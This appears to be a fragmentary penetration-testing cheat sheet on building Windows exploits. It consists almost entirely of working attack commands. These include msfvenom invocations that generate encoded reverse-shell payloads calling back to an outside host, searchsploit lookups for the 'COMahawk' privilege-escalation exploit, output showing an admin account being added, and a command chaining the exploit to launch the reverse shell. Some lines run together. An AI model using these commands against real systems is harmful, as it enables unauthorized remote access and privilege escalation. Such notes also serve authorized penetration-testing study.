Build Exploits
Win 8.1 PRO Build 9600 - x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f cMicrosoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md# System version number
winver - 1803 OS Build 17134.112
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ReleaseId REG_SZ 1803
$ searchsploit 1803
# Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
| windows/local/47684.md
$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md
C:\Users\test\Desktop>COMahawk.exe
[\] Progress: 1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f exe -e x86/shikata_ga_nai -i 8 -o rev.exe
COMahawk.exe "\Users\test\Desktop\rev.exe &"Win XP SP0/SP1
Last updated